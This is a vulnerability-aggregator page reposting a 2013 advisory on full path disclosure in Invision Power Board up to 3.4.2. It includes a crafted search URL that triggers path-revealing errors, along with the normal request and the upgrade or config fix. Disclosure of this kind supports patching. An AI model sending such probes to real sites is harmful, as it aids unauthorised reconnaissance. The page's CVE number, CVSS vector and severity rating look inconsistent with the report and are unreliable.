Advertisement






Invision Power Board < 3.4.2 Full Path Disclosure

CVE Category Price Severity
CVE-2015-1203 CWE-200 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2013-03-04
CPE
cpe:cpe:/a:invisionpower:invision_power_board:3.4.2
CVSS EPSS EPSSP
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.08 0.87679

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2013030024

Below is a copy:

# Author: Infern0_
# Contact: [email protected]
# Vendor: http://www.invisionpower.com
# Vulnerability: Full Path Disclosure
# Vendor informated at: 2 February 2013
# Solution: Upgrade to version 3.4.3 or Disable error display in config files, following this:
# http://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors

It works on v.3.4.2 and less.
Will be patched in v.3.4.3. 

To reproduce this issue do this:
http://www.example-site.com/index.php?app=core&module=search&do=search&search_app_filters[]=date&search_term=trolololo

Guilty is variable 'search_app_filters' which wait to receive doubled-array(forums][sortKey]). 
If it doesn't get it correctly then errors with Full Path show up. 

Normal request would looks like this:

http://www.example-site.com/index.php?app=core&module=search&do=search&search_app_filters[forums][sortKey]=date&search_term=trolololo



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.